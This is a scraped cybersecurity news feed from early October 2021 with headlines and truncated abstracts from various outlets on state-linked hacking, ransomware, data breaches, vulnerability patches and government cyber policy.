Abstract
Microsoft on Monday released evidence showing Iranian-linked hackers targeting and at times compromising systems of U.S. and Israeli defense technology companies.The Hill
October 11, 2021 – Education
Verify End-Users at the Helpdesk to Prevent Social Engineering Cyber Attack Full Text
Abstract
Although organizations commonly go to great lengths to address security vulnerabilities that may exist within their IT infrastructure, an organization's helpdesk might pose a bigger threat due to social engineering attacks. Social engineering is "the art of manipulating people so they give up confidential information," according to Webroot . There are many different types of social engineering schemes but one is area of vulnerability is how social engineering might be used against a helpdesk technician to steal a user's credentials. The Process of Gaining Access With Social Engineering The first step in such an attack is usually for the attacker to gather information about the organization that they are targeting. The attacker might start by using information that is freely available on the Internet to figure out who within the organization is most likely to have elevated permissions or access to sensitive information. An attacker can often get this informationThe Hacker News
October 11, 2021 – Vulnerabilities
Apple released emergency update to fix zero-day actively exploited Full Text
Abstract
Apple released emergency updates for both iOS and iPadOS to address a zero-day flaw that is actively exploited in the wild. Apple has released iOS 15.0.2 and iPadOS 15.0.2 to address a zero-day flaw, tracked as CVE-2021-30883, that is actively exploited...Security Affairs
October 11, 2021 – Vulnerabilities
Emergency Apple iOS 15.0.2 update fixes zero-day used in attacks Full Text
Abstract
Apple has released iOS 15.0.2 and iPadOS 15.0.2 to fix a zero-day vulnerability that is actively exploited in the wild in attacks targeting Phones and iPads.BleepingComputer
October 11, 2021 – Phishing
Verizon Phishing Scam Targets Customers Through a Text Message Full Text
Abstract
Cybercriminals behind this scam ask subscribers to provide their personal information. If they for this trap, their security number, bank account number, and other information could be hacked.Tech Times
October 11, 2021 – Government
Former Pentagon official says China has won artificial intelligence battle Full Text
Abstract
The Pentagon's former software chief resigned and said that China is headed toward global dominance in artificial intelligence due to the relatively slow pace of innovation in the United States.The Hill
October 11, 2021 – Privacy
Indian-Made Mobile Spyware Targeted Human Rights Activist in Togo Full Text
Abstract
A prominent Togolese human rights defender has been targeted with spyware by a threat actor known for striking victims in South Asia, marking the hacking group's first foray into digital surveillance in Africa. Amnesty International tied the covert attack campaign to a collective tracked as " Donot Team " (aka APT-C-35), which has been linked to cyber offensives in India and Pakistan, while also identifying apparent evidence coupling the group's infrastructure to an Indian company called Innefu Labs. The unnamed activist is believed to have targeted over a period of two months starting in December 2019 with the help of fake Android applications and spyware-loaded emails. "The persistent attacks over WhatsApp and email tried to trick the victim into installing a malicious application that masqueraded as a secure chat application," Amnesty International said in a report published last week. "The application was in fact a piece of custom Android spywaThe Hacker News
October 11, 2021 – Botnet
Security Service of Ukraine arrested a man operating a huge DDoS botnet Full Text
Abstract
Ukrainian police arrested a cybercriminal who controlled a botnet composed of 100,000 devices that was available for rent to launch DDoS attacks. Security Service of Ukraine (SSU) has arrested a hacker who controlled a DDoS botnet composed of 100,000...Security Affairs
October 11, 2021 – Vulnerabilities
LibreOffice, OpenOffice bug allows hackers to spoof signed docs Full Text
Abstract
LibreOffice and OpenOffice have pushed updates to address a vulnerability that makes it possible for an attacker to manipulate documents to appear as signed by a trusted source.BleepingComputer
October 11, 2021 – Business
Wiz raises $250 mln, values Israeli cyber firm at $6 bln Full Text
Abstract
Wiz said that most of its previous investors -- Sequoia Capital, Index Ventures, Insight Partners, Greenoaks, Salesforce, CyberStarts, Bernard Arnault, and Howard Schultz -- participated in the round.Reuters
October 11, 2021 – General
Majority of Americans concerned about cyberattacks on critical groups: poll Full Text
Abstract
The vast majority of Americans are concerned about cyberattacks on critical groups, in particular those in the financial and national security sectors, a poll released Monday found.The Hill
October 11, 2021 – APT
Iran-linked DEV-0343 APT target US and Israeli defense technology firms Full Text
Abstract
DEV-0343: Iran-linked threat actors are targeting US and Israeli defense technology companies leveraging password spraying attacks. Researchers at Microsoft Threat Intelligence Center (MSTIC) and Microsoft Digital Security Unit (DSU) uncovered a malicious...Security Affairs
October 11, 2021 – Hacker
Microsoft: Iran-linked hackers target US defense tech companies Full Text
Abstract
Iran-linked threat actors are targeting the Office 365 tenants of US and Israeli defense technology companies in extensive password spraying attacks.BleepingComputer
October 11, 2021 – Breach
Oregon Eye Specialists discloses data breach following employee email compromise Full Text
Abstract
The exposed data likely includes customers’ names, dates of birth, dates of service, medical record numbers, financial account information, and health insurance provider names and/or policy numbers.The Daily Swig
October 11, 2021 – Vulnerabilities
Improper Certificate Validation issue in LibreOffice and OpenOffice allows signed docs spoofing Full Text
Abstract
LibreOffice and OpenOffice released security updates to address a vulnerability that can be exploited by an attacker to spoof signed documents. LibreOffice and OpenOffice released security updates to address a moderate-severity flaw that...Security Affairs
October 11, 2021 – Hacker
Microsoft: Iran-linked hackers target US defense tech companies Full Text
Abstract
Iran-linked threat actors are targeting the Office 365 tenants of US and Israeli defense technology companies in extensive password spraying attacks.BleepingComputer
October 11, 2021 – 5G
ZTE widens bug bounty to focus on 5G security Full Text
Abstract
ZTE has widened a bug bounty scheme to plug security vulnerabilities in its products, especially potential holes brought about by the launch of commercial 5G networks and services.ZDNet
October 11, 2021 – Privacy
Donot Team targets a Togo prominent activist with Indian-made spyware Full Text
Abstract
A Togolese human rights advocate was hit by mobile spyware that has been allegedly developed by an Indian firm called Innefu Labs. Researchers from Amnesty International have uncovered a cyberespionage campaign tracked as 'Donot Team' (aka APT-C-35)...Security Affairs
October 11, 2021 – Cryptocurrency
Huawei Cloud targeted by updated cryptomining malware Full Text
Abstract
A new version of a 2020 crypto-mining malware that was previously targeting Docker containers has now been spotted focusing on new cloud service providers like the Huawei Cloud.BleepingComputer
October 11, 2021 – General
Cyberattacks Concerning to Most in US: Pearson/AP-NORC Poll Full Text
Abstract
Most Americans across party lines have serious concerns about cyberattacks on U.S. computer systems and view China and Russia as major threats, according to a newly released poll.Security Week
October 11, 2021 – Education
NSA explains how to avoid dangers of Wildcard TLS Certificates and ALPACA attacks Full Text
Abstract
The NSA issued a technical advisory to warn organizations against the use of wildcard TLS certificates and the new ALPACA TLS attack. The National Security Agency (NSA) is warning organizations against the use of wildcard TLS certificates and the new ALPACA...Security Affairs
October 11, 2021 – Denial Of Service
Ukrainian police arrest DDoS operator controlling 100,000 bots Full Text
Abstract
Ukrainian police have arrested a hacker who controlled a 100,000 device botnet used to perform DDoS attacks on behalf of paid customers.BleepingComputer
October 11, 2021 – Solution
Microsoft Defender for Identity to detect Windows Bronze Bit attacks Full Text
Abstract
Microsoft is working on adding support for Bronze Bit attacks detection to Microsoft Defender for Identity to make it easier for Security Operations teams to detect attempts to abuse a Windows Kerberos bug tracked as CVE-2020-17049.BleepingComputer
October 11, 2021 – Insider Threat
Nuclear engineer’s espionage plans unraveled by undercover FBI agent Full Text
Abstract
A Navy nuclear engineer and his wife were arrested under espionage-related charges alleging violations of the Atomic Energy Act after selling restricted nuclear-powered warship design data to a person they believed was a foreign power agent.BleepingComputer
October 11, 2021 – Attack
Pacific City Bank discloses ransomware attack claimed by AvosLocker Full Text
Abstract
Pacific City Bank (PCB), one of the largest Korean-American community banking service providers in America, has disclosed a ransomware incident that took place last month.BleepingComputer
October 10, 2021 – Malware
FontOnLake malware infects Linux systems via trojanized utilities Full Text
Abstract
A newly discovered malware family has been infecting Linux systems concealed in legitimate binaries. Dubbed FontOnLake, the threat delivers backdoor and rootkit components.BleepingComputer
October 10, 2021 – Vulnerabilities
Medtronic recalls some controllers used with some of its insulin pumps over cyberattack risks Full Text
Abstract
Medical device maker Medtronic recalled the remote controllers used with some of its insulin pumps because of dangerous vulnerabilities. Medical device maker Medtronic has recalled the remote controllers used with some of its insulin pumps because...Security Affairs
October 10, 2021 – Privacy
Amnesty International links cybersecurity firm to spyware operation Full Text
Abstract
A report by Amnesty International links an Indian cybersecurity company to an Android spyware program used to target prominent activists.BleepingComputer
October 10, 2021 – General
Security Affairs newsletter Round 335 Full Text
Abstract
A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the international press subscribe here. Previously...Security Affairs
October 10, 2021 – Attack
Previously undetected FontOnLake Linux malware used in targeted attacks Full Text
Abstract
ESET researchers spotted a previously unknown, modular Linux malware, dubbed FontOnLake, that has been employed in targeted attacks. ESET researchers spotted a previously unknown, modular Linux malware, dubbed FontOnLake, that was employed in targeted...Security Affairs
October 09, 2021 – Insider Threat
Bank of America insider charged with money laundering for BEC scams Full Text
Abstract
The U.S. District Court for the Eastern District of Virginia has charged three men with money laundering and aggravated identity theft after allegedly conducting a business email compromise (BEC) scheme.BleepingComputer
October 09, 2021 – Solution
Microsoft adds tamper protection to Windows 11 security baseline Full Text
Abstract
Microsoft has released the final version of its security configuration baseline settings for Windows 11, downloadable today using the Microsoft Security Compliance Toolkit.BleepingComputer
October 9, 2021 – Vulnerabilities
Google addresses four high-severity flaws in Chrome Full Text
Abstract
Google has addressed a total of four high-severity vulnerabilities in the Chrome version for Windows, Mac, and Linux. Google released security updates to address a total of four high-severity vulnerabilities in the Chrome version for Windows, Mac,...Security Affairs
October 9, 2021 – APT
Google Says Russian APT Targeting Journalists, Politicians Full Text
Abstract
Some 14,000 Google users were warned of being suspected targets of Russian government-backed threat actors. Post that, the tech giant announced cybersecurity updates - particularly for email accounts of high-profile users.Gov Info Security
October 9, 2021 – Vulnerabilities
Security expert published NMAP script for Apache CVE-2021-41773 vulnerability Full Text
Abstract
Security expert Dhiraj Mishra published an NMAP script for the CVE-2021-41773 Path Traversal vulnerability affecting Apache Web Server version 2.4.49. Security researcher Dhiraj Mishra released an NMAP script for the CVE-2021-41773 path...Security Affairs
October 9, 2021 – Attack
Attackers Encrypt VMware ESXi Server With Python Ransomware Full Text
Abstract
According to Sophos, the script contains multiple hardcoded encryption keys, and a routine for generating even more keys, which led the researchers to the conclusion that the ransomware creates a unique key at each run.Security Week
October 9, 2021 – Breach
Sky.com servers exposed via misconfiguration Full Text
Abstract
CyberNews researchers found an exposed configuration file hosted on a Sky.com subdomain containing production data. Original post @ https://cybernews.com/news/sky-com-servers-exposed-via-misconfiguration/ CyberNews researchers found an exposed...Security Affairs
October 9, 2021 – Outage
Cox Media Group took down broadcasts after a ransomware attack Full Text
Abstract
American media conglomerate Cox Media Group (CMG) was hit by a ransomware attack that took down live TV and radio broadcast streams in June 2021. The American media conglomerate Cox Media Group (CMG) announced it was hit by a ransomware attack that...Security Affairs
October 08, 2021 – Ransomware
The Week in Ransomware - October 8th 2021 - Making arrrests Full Text
Abstract
This week's big news is the arrests of two ransomware operators in Ukraine responsible for hundreds of attacks targeting organizations worldwide.BleepingComputer
October 08, 2021 – Cryptocurrency
Democrats urge federal agencies to address use of cryptocurrencies for ransomware payments Full Text
Abstract
A group of Democrats on Friday urged the Biden administration to do more to confront the growing use of cryptocurrency markets in ransomware attacks, which have become an increasing national security threat over the past year.The Hill
October 08, 2021 – Criminals
Ransomware Group FIN12 Aggressively Going After Healthcare Targets Full Text
Abstract
An "aggressive" financially motivated threat actor has been identified as linked to a string of RYUK ransomware attacks since October 2018, while maintaining close partnerships with TrickBot-affiliated threat actors and using a publicly available arsenal of tools such as Cobalt Strike Beacon payloads to interact with victim networks. Cybersecurity firm Mandiant attributed the intrusions to a Russian-speaking hacker group codenamed FIN12, and previously tracked as UNC1878 , with a disproportionate focus on healthcare organizations with more than $300 million in revenue, among others, including education, financial, manufacturing, and technology sectors, located in North America, Europe, and the Asia Pacific. "FIN12 relies on partners to obtain initial access to victim environments," Mandiant researchers said . "Notably, instead of conducting multifaceted extortion, a tactic widely adopted by other ransomware threat actors, FIN12 appears to prioritize speedThe Hacker News
October 08, 2021 – Outage
Cox Media Group confirms ransomware attack that took down broadcasts Full Text
Abstract
American media conglomerate Cox Media Group (CMG) confirmed that it was hit by a ransomware attack that took down live TV and radio broadcast streams in June 2021.BleepingComputer
October 08, 2021 – Government
Biden signs bill to strengthen K-12 school cybersecurity Full Text
Abstract
President Biden on Friday signed into law legislation intended to strengthen the cybersecurity of K-12 institutions after a year in which cyberattacks aimed at schools spiked as classes moved online during the COVID-19 pandemic.The Hill
October 08, 2021 – Malware
Researchers Warn of FontOnLake Rootkit Malware Targeting Linux Systems Full Text
Abstract
Cybersecurity researchers have detailed a new campaign that likely targets entities in Southeast Asia with a previously unrecognized Linux malware that's engineered to enable remote access to its operators, in addition to amassing credentials and function as a proxy server. The malware family, dubbed " FontOnLake " by Slovak cybersecurity firm ESET, is said to feature "well-designed modules" that are continuously being upgraded with new features, indicating an active development phase. Samples uploaded to VirusTotal point to the possibility that the very first intrusions utilizing this threat have been happening as early as May 2020. Avast and Lacework Labs are tracking the same malware under the moniker HCRootkit. "The sneaky nature of FontOnLake's tools in combination with advanced design and low prevalence suggest that they are used in targeted attacks," ESET researcher Vladislav Hrčka said . "To collect data or conduct other malicThe Hacker News
October 08, 2021 – Phishing
Intuit warns QuickBooks customers of ongoing phishing attacks Full Text
Abstract
Intuit has warned QuickBooks customers that they are targeted by an ongoing phishing campaign impersonating the company and trying to lure potential victims with fake renewal charges.BleepingComputer
October 8, 2021 – Hacker
Atom Silo Group Eyeing Confluence Servers Full Text
Abstract
SophosLabs researchers uncovered Atom Silo, a new ransomware group almost identical to LockFile, actively exploiting Atlassian Confluence Server and Data Center flaw. The group is using several novel techniques that make it very challenging to examine, including DLL side-loading to interrupt endpo ... Read MoreCyware Alerts - Hacker News
October 08, 2021 – Disinformation
Poll: Americans think US politicians, social media spread misinformation more than foreign governments Full Text
Abstract
The majority of Americans believe U.S. politicians and social media companies spread misinformation online more than China, Russia or other foreign governments, a poll released Friday found.The Hill
October 08, 2021 – Breach
Twitch game page backgrounds defaced with Jeff Bezos’ face Full Text
Abstract
On Twitch's website's game pages today appeared a close up of Jeff Bezos' face, in what appears to be a mysterious defacement attack.BleepingComputer
October 8, 2021 – Botnet
New Zealand CERT Warns of FluBot Using New Tricks Full Text
Abstract
The infamous FluBot banking Trojan is targeting New Zealand mobile users wherein it uses different types of text-based messaging lures regarding parcel delivery and FluBot infection alert. After a successful infection, FluBot operators use the malware to steal payment information, text messages, c ... Read MoreCyware Alerts - Hacker News
October 8, 2021 – General
58% of all nation-state attacks in the last year were launched by Russian nation-state actors Full Text
Abstract
Microsoft revealed that Russia-linked cyberespionage groups are behind the majority of the nation-state cyber attacks on US government agencies. Microsoft revealed that most of the cyber attacks on US government agencies are orchestrated by Russia-linked...Security Affairs
October 08, 2021 – Ransomware
Russian orgs heavily targeted by smaller tier ransomware gangs Full Text
Abstract
Even though American and European companies enjoy the lion's share in ransomware attacks launched from Russian ground, companies in the country aren't spared from having to deal with file encryption and double-extortion troubles.BleepingComputer
October 8, 2021 – Attack
Hydra Spreads Tentacles to Target European Banks Full Text
Abstract
MalwareHunterTeam reported a new campaign spreading Hydra banking trojan across European banking platforms, specifically customers of Germany’s second-largest financial institution. The malware uses different encryption methods to avoid detection, along with the use of Tor for communication. ... Read MoreCyware Alerts - Hacker News
October 8, 2021 – Government
The Netherlands declares war on ransomware operations Full Text
Abstract
The Dutch government will not tolerate ransomware attacks that could threaten national security, it will use intelligence or military services to curb them. The Dutch government announced that it will not tolerate cyberattacks that pose a risk to its national...Security Affairs
October 08, 2021 – Attack
Engineering giant Weir Group hit by ransomware attack Full Text
Abstract
Scottish multinational engineering firm Weir Group has disclosed by what it called an "attempted ransomware attack" that led to "significant temporary disruption" in the second half of September.BleepingComputer
October 8, 2021 – Vulnerabilities
Google Patches Four Severe Vulnerabilities in Chrome Full Text
Abstract
Google this week announced the release of an updated Chrome version for Windows, Mac, and Linux, to address a total of four high-severity security vulnerabilities in the browser.Security Week
October 8, 2021 – APT
Google warns of APT28 attack attempts against 14,000 Gmail users Full Text
Abstract
Google warned more than 14,000 Gmail users that they have been the target of nation-state spear-phishing campaigns. On Wednesday, Google announced to have warned approximately 14,000 Gmail users that they had been targeted by nation-state hackers. Shane...Security Affairs
October 08, 2021 – General
Microsoft: Russian state hackers behind 53% of attacks on US govt agencies Full Text
Abstract
Microsoft says that Russian-sponsored hacking groups are increasingly targeting US government agencies, with roughly 58% of all nation-state attacks observed by Microsoft between July 2020 and June 2021 coming from Russia.BleepingComputer
October 8, 2021 – Hacker
Update: Hackers of SolarWinds stole data on U.S. sanctions policy, intelligence probes Full Text
Abstract
The campaign alarmed officials with its stealth and careful staging. The hackers burrowed into the code production process at SolarWinds, which makes widely used software for managing networks.Reuters
October 8, 2021 – Vulnerabilities
Apache rolled out a new update in a few days to fix incomplete patch for an actively exploited flaw Full Text
Abstract
Apache Software Foundation has released HTTP Web Server 2.4.51 to completely address a vulnerability that has been actively exploited in the wild. Apache Software Foundation has released HTTP Web Server 2.4.51 to address an actively exploited path...Security Affairs
October 08, 2021 – Breach
BrewDog exposed data for over 200,000 shareholders and customers Full Text
Abstract
BrewDog, the Scottish brewery and pub chain famous for its crowd-ownership model and the tasty IPAs, has irreversibly exposed the details of 200,000 of its shareholders and customers.BleepingComputer
October 07, 2021 – Vulnerabilities
New Patch Released for Actively Exploited 0-Day Apache Path Traversal to RCE Attacks Full Text
Abstract
The Apache Software Foundation on Thursday released additional security updates for its HTTP Server product to remediate what it says is an "incomplete fix" for an actively exploited path traversal and remote code execution flaw that it patched earlier this week. CVE-2021-42013 , as the new vulnerability is identified as, builds upon CVE-2021-41773 , a flaw that impacted Apache web servers running version 2.4.49 and involved a path normalization bug that could enable an adversary to access and view arbitrary files stored on a vulnerable server. Although the flaw was addressed by the maintainers in version 2.4.50, a day after the patches were released it became known that the weakness could also be abused to gain remote code execution if the "mod_cgi" module was loaded and the configuration "require all denied" was absent, prompting Apache to issue another round of emergency updates. "It was found that the fix for CVE-2021-41773 in Apache HTThe Hacker News
October 07, 2021 – Attack
Google warns 14,000 Gmail users targeted by Russian hackers Full Text
Abstract
Google has warned about 14,000 of its users about being targeted in a state-sponsored phishing campaign from APT28, a threat group that has been linked to Russia.BleepingComputer
October 7, 2021 – Education
New ASEAN regional cybersecurity training centre opens in Singapore Full Text
Abstract
A new ASEAN regional cybersecurity training centre that will see ASEAN member states work together to conduct research, share knowledge and train to respond to cyber threats.Channel News Asia
October 07, 2021 – Criminals
Russian-speaking hacking group scaling up ransomware attacks on hospitals Full Text
Abstract
A Russian-speaking cyber criminal group is disproportionately using ransomware attacks to target hospitals and health care groups across North America as the COVID-19 pandemic continues, according to new research released Thursday.The Hill
October 07, 2021 – Vulnerabilities
Code Execution Bug Affects Yamale Python Package — Used by Over 200 Projects Full Text
Abstract
A high-severity code injection vulnerability has been disclosed in 23andMe's Yamale, a schema and validator for YAML, that could be trivially exploited by adversaries to execute arbitrary Python code. The flaw, tracked as CVE-2021-38305 (CVSS score: 7.8), involves manipulating the schema file provided as input to the tool to circumvent protections and achieve code execution. Particularly, the issue resides in the schema parsing function, which allows any input passed to be evaluated and executed, resulting in a scenario where a specially-crafted string within the schema can be abused for the injection of system commands. Yamale is a Python package that allows developers to validate YAML — a data serialization language often used for writing configuration files — from the command line. The package is used by at least 224 repositories on GitHub. "This gap allows attackers that can provide an input schema file to perform Python code injection that leads to code executThe Hacker News
October 7, 2021 – Criminals
FIN12 ransomware gang don’t implement double extortion to prioritize speed Full Text
Abstract
Researchers detailed the activities of the FIN12 ransomware group that earned million of dollars over the past years. Researchers from Mandiant published a detailed report on the activities of a financially motivated ransomware group tracked as FIN12...Security Affairs
October 07, 2021 – Solution
Microsoft is disabling Excel 4.0 macros by default to protect users Full Text
Abstract
Microsoft will soon begin disabling Excel 4.0 XLM macros by default in Microsoft 365 tenants to protect customers from malicious documents.BleepingComputer
October 7, 2021 – General
Microsoft: Russia Behind 58% of Detected State-Backed Hacks Full Text
Abstract
Russia accounted for most state-sponsored hacking detected by Microsoft over the past year, with a 58% share, mostly targeting government agencies and think tanks in the United States.Security Week
October 07, 2021 – Hacker
Microsoft report finds Russia dominant force behind cyberattacks in past year Full Text
Abstract
Cyberattacks originating in Russia accounted for more than half of intrusions tracked by Microsoft since mid-2020, the company said in a report released Thursday.The Hill
October 07, 2021 – Education
Penetration Testing Your AWS Environment - A CTO’s Guide Full Text
Abstract
So, you've been thinking about getting a Penetration Test done on your Amazon Web Services (AWS) environment. Great! What should that involve exactly? There are many options available, and knowing what you need will help you make your often limited security budget go as far as possible. Broadly, the key focus areas for most penetration tests involving AWS: Your externally accessible cloud infrastructure Any application(s) you're building or hosting Your internal cloud infrastructure Your AWS configuration itself Secrets management We'll look at each one, starting with the most important: External Infrastructure The good news here is that, by default, AWS does its best to help you stay secure. For example, the default security groups don't let your EC2 instances receive communication from the outside world unless you actively specify it by adding additional rules. That said, AWS still allows you plenty of rope to hang yourself with if you're not carefuThe Hacker News
October 7, 2021 – Vulnerabilities
PoC exploit for 2 flaws in Dahua cameras leaked online Full Text
Abstract
A proof of concept exploit for two authentication bypass vulnerabilities in Dahua cameras is available online, users are recommended to immediately apply updates. Experts warn of the availability of proof of concept (PoC) exploit code for a couple...Security Affairs
October 07, 2021 – Vulnerabilities
Apache emergency update fixes incomplete patch for exploited bug Full Text
Abstract
Apache Software Foundation has released HTTP Web Server 2.4.51 after researchers discovered that a previous security update didn't correctly fix an actively exploited vulnerability.BleepingComputer
October 7, 2021 – Business
Gretel AI raises $50M for a platform that provides synthetic datasets to ensure privacy of actual data Full Text
Abstract
Anthos Capital is leading the round with Section 32 also participating alongside Greylock and Moonshots Capital. Greylock led the company’s previous round in 2020. It has raised $65.5 million to date.TechCrunch
October 07, 2021 – Government
New U.S. Government Initiative Holds Contractors Accountable for Cybersecurity Full Text
Abstract
The U.S. government on Wednesday announced the formation of a new Civil Cyber-Fraud Initiative that aims to hold contractors accountable for failing to meet required cybersecurity requirements in order to safeguard public sector information and infrastructure. "For too long, companies have chosen silence under the mistaken belief that it is less risky to hide a breach than to bring it forward and to report it," said Deputy Attorney General Monaco in a press statement. "Well that changes today, [and] we will use our civil enforcement tools to pursue companies, those who are government contractors who receive federal funds, when they fail to follow required cybersecurity standards — because we know that puts all of us at risk." The Civil Cyber-Fraud Initiative is part of the U.S. Justice Department's (DoJ) efforts to build resilience against cybersecurity intrusions and holding companies to task for deliberately providing deficient cybersecurity products orThe Hacker News
October 7, 2021 – Breach
Twitch data breach updates: login credentials or card numbers not exposed Full Text
Abstract
An anonymous individual has leaked the source code and data of the popular video streaming platform Twitch via a torrent file posted on 4chan. An anonymous 4chan user has published a torrent link to a 128GB file on the 4chan discussion board, the leaked...Security Affairs
October 07, 2021 – Attack
FIN12 hits healthcare with quick and focused ransomware attacks Full Text
Abstract
While most ransomware actors spend time on the victim network looking for important data to steal, one group favors quick malware deployment against sensitive, high-value targets.BleepingComputer
October 7, 2021 – Vulnerabilities
Cisco Patches High-Severity Vulnerabilities in Security Appliances, Business Switches Full Text
Abstract
Cisco this week released patches for multiple high-severity vulnerabilities affecting its Web Security Appliance (WSA), Intersight Virtual Appliance, Small Business 220 switches, and other products.Security Week
October 07, 2021 – General
Apple now requires all apps to make it easy for users to delete their accounts Full Text
Abstract
All third-party iOS, iPadOS, and macOS apps that allow users to create an account should also provide a method for terminating their accounts from within the apps beginning next year, Apple said on Wednesday. "This requirement applies to all app submissions starting January 31, 2022," the iPhone maker said , urging developers to "review any laws that may require you to maintain certain types of data, and to make sure your app clearly explains what data your app collects, how it collects that data, all uses of that data, your data retention/deletion policies." While the feature could be convenient, it's worth noting that Apple only says the mechanism should have a provision for users to "initiate deletion of their account from within the app," meaning it's possible that apps could redirect users to a website or prompt them to send an email in order actually to purge their information. The reminder follows updates to App Store Review GuidelineThe Hacker News
October 7, 2021 – APT
Operation GhostShell: MalKamak APT targets aerospace and telco firms Full Text
Abstract
Operation GhostShell: Threat actors used ShellClient malware in cyberespionage campaigns aimed at companies in the aerospace and telecommunications sectors. Hackers use stealthy ShellClient malware on aerospace, telco firms Cybereason Nocturnus...Security Affairs
October 07, 2021 – Malware
Vidar stealer abuses Mastodon to silently get C2 configuration Full Text
Abstract
The Vidar stealer has returned in a new campaign that abuses the Mastodon social media network to get C2 configuration without raising alarms.BleepingComputer
October 7, 2021 – Disinformation
No, there isn’t proof that the private data of 1.5 billion Facebook users is being sold by hackers. Full Text
Abstract
The claim of the breach came from an anonymous account on a hacking forum that, according to Vice, obtained access to the database from a supposed company called “X2Emails.”New York Times
October 07, 2021 – Business
Firefox now shows ads as sponsored address bar suggestions Full Text
Abstract
Mozilla is now showing ads in the form of sponsored Firefox contextual suggestions when U.S. users type in the URL address bar.BleepingComputer
October 7, 2021 – Ransomware
Roundup of ransomware in the CIS Full Text
Abstract
Although there are different vectors of malware distribution, most of the current crop of ransomware threats targeting businesses in the CIS penetrate the victim’s network via RDP.Kaspersky Labs
October 07, 2021 – Vulnerabilities
Microsoft fixes bug blocking Azure Virtual Desktops security updates Full Text
Abstract
Microsoft has fixed a bug blocking some Azure Virtual Desktop (AVD) devices from downloading and installing monthly security via Windows Server Update Services (WSUS) since early July.BleepingComputer
October 7, 2021 – Education
Cybersecurity best practices lagging, despite people being aware of the risks Full Text
Abstract
According to a report by National Cybersecurity Alliance and CybSafe, public response, and implementation of commonly known best practices including strong passwords, MFA and others are tepid at best.Help Net Security
October 07, 2021 – Vulnerabilities
Unpatched Dahua cams vulnerable to unauthenticated remote access Full Text
Abstract
Unpatched Dahua cameras are prone to two authentication bypass vulnerabilities, and a proof of concept exploit that came out today makes the case of upgrading pressing.BleepingComputer
October 07, 2021 – Breach
Twitch: No credentials or card numbers exposed in data breach Full Text
Abstract
Twitch says that no login credentials and credit card numbers belonging to users or streamers were exposed following yesterday's massive data leak.BleepingComputer
October 6, 2021 – Vulnerabilities
Canopy Parental Control App Wide Open to Unpatched XSS Bugs Full Text
Abstract
The possible cyberattacks include disabling monitoring, location-tracking of children and malicious redirects of parent-console users.Threatpost
October 6, 2021 – Malware
ESPecter Bootkit Malware Haunts Victims with Persistent Espionage Full Text
Abstract
The rare UEFI bootkit drops a fully featured backdoor on PCs and gains the ultimate persistence by modifying the Windows Boot Manager.Threatpost
October 6, 2021 – Breach
Twitch Gets Gutted: All Source Code Leaked Full Text
Abstract
An anonymous user posted a link to a 125GB torrent to 4chan yesterday, containing all of Twitch’s source code, comments going back to its inception and more.Threatpost
October 06, 2021 – Breach
Twitch Suffers Massive 125GB Data and Source Code Leak Due to Server Misconfiguration Full Text
Abstract
Interactive livestreaming platform Twitch acknowledged a "breach" after an anonymous poster on the 4chan messaging board leaked its source code, an unreleased Steam competitor from Amazon Game Studios, details of creator payouts , proprietary software development kits, and other internal tools. The Amazon-owned service said it's "working with urgency to understand the extent of this," adding the data was exposed "due to an error in a Twitch server configuration change that was subsequently accessed by a malicious third party." "At this time, we have no indication that login credentials have been exposed," Twitch noted in a post published late Wednesday. "Additionally, full credit card numbers are not stored by Twitch, so full credit card numbers were not exposed." The forum user claimed the hack is designed to "foster more disruption and competition in the online video streaming space" because "their communiThe Hacker News
October 06, 2021 – Education
Cyber Security WEBINAR — How to Ace Your InfoSec Board Deck Full Text
Abstract
Communication is a vital skill for any leader at an organization, regardless of seniority. For security leaders, this goes double. Communicating clearly works on multiple levels. On the one hand, security leaders and CISOs must be able to communicate strategies clearly – instructions, incident response plans, and security policies. On the other, they must be able to communicate the importance of security and the value of having robust defenses to the C-level. For CISOs and other security leaders, this latter skill is crucial but often overlooked or not prioritized. A new webinar: " How to ace your Infosec board deck ," looks to shed light on both the importance of being able to communicate clearly with management, and key strategies to do so effectively. The webinar will feature a conversation with vCISO and Cybersecurity Consultant Dr. Eric Cole, as well as Norwest Venture Partners General Partner Dave Zilberman. More so than just talking about the dollar value of a secThe Hacker News
October 06, 2021 – Government
U.S. govt to sue contractors who hide breach incidents Full Text
Abstract
Under the new Civil Cyber-Fraud Initiative that the U.S. Department of Justice announced today, government contractors are accountable in a civil court if they don't report a breach or fail to meet required cybersecurity standards.BleepingComputer
October 6, 2021 – Outage
Attackers had Access to OSF HealthCare’s IT Systems for Six Weeks Before Outage Full Text
Abstract
The patient information exposed by the incident included names, birthdates, Social Security numbers, treatment details, prescription details, and health insurance details.Becker’s Health IT Review
October 06, 2021 – General
Lawmakers advocate for establishment of standalone House and Senate cyber panels Full Text
Abstract
Lawmakers on both sides of the aisle Wednesday argued for the need to establish standalone cybersecurity committees in the House and Senate to address mounting threats and streamline an increasingly bogged down process to approve legislation.The Hill
October 06, 2021 – Hacker
Iranian Hackers Abuse Dropbox in Cyberattacks Against Aerospace and Telecom Firms Full Text
Abstract
Details have emerged about a new cyber espionage campaign directed against the aerospace and telecommunications industries, primarily in the Middle East, with the goal of stealing sensitive information about critical assets, organizations' infrastructure, and technology while remaining in the dark and successfully evading security solutions. Boston-based cybersecurity company Cybereason dubbed the attacks " Operation Ghostshell ," pointing out the use of a previously undocumented and stealthy remote access trojan (RAT) called ShellClient that's deployed as the main spy tool of choice. The first sign of the attacks was observed in July 2021 against a handpicked set of victims, indicating a highly targeted approach. "The ShellClient RAT has been under ongoing development since at least 2018, with several iterations that introduced new functionalities, while it evaded antivirus tools and managed to remain undetected and publicly unknown," researchers Tom FakThe Hacker News
October 6, 2021 – Hacker
Exclusive: Researchers dumped Gigabytes of data from Agent Tesla C2Cs Full Text
Abstract
Resecurity researchers dumped Gigabytes of data from Agent Tesla C2Cs, one of the most well-known cyberespionage tools suffers a data leakage. Agent Tesla, first discovered in late 2014, is an extremely popular "malware-as-a-service" Remote Access...Security Affairs
October 06, 2021 – Hacker
Hackers use stealthy ShellClient malware on aerospace, telco firms Full Text
Abstract
Threat researchers investigating malware used to target companies in the aerospace and telecommunications sectors discovered a new threat actor that has been running cyber espionage campaigns since at least 2018.BleepingComputer
October 6, 2021 – Business
Blackstone-backed Patria creates Latam cybersecurity platform, eyes IPO Full Text
Abstract
Brazilian asset manager Patria Investments Ltd has acquired cybersecurity companies Neosecure and Proteus to create the largest information security platform in Latin America, it said on Tuesday.Reuters
October 06, 2021 – Government
Bill requiring companies report cyber incidents moves forward in the Senate Full Text
Abstract
